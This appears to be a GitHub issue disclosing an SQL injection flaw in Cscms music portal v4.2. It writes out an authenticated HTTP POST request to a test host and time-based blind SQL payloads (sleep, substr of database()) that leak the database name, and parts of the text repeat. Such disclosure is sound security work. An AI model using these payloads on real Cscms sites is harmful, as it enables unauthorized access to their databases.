Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logs in, the following data package is constructed
POST /admin.php/dance/admin/lists/zhuan HTTP/1.1 Host: cscms.test Content-Length: 23 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://cscms.test Referer: http://cscms.test/admin.php/dance/admin/lists?v=7131 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n9lv1ptm53932qcefgtfamknehtiv096;XDEBUG_SESSION=PHPSTORM Connection: close id[]=(sleep(5))&cid=5
The payload executes and sleeps for 5 seconds
construct payload
(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)
Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code
The text was updated successfully, but these errors were encountered:
No branches or pull requests
SQL injection vulnerability exists in Cscms music portal system v4.2 (dance_Lists.php_zhuan)
Details
After the administrator logs in, the following data package is constructed
The payload executes and sleeps for 5 seconds
construct payload
(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)Because the first letter of the background database name is "c", it sleeps for 5 seconds
Vulnerability source code
The text was updated successfully, but these errors were encountered: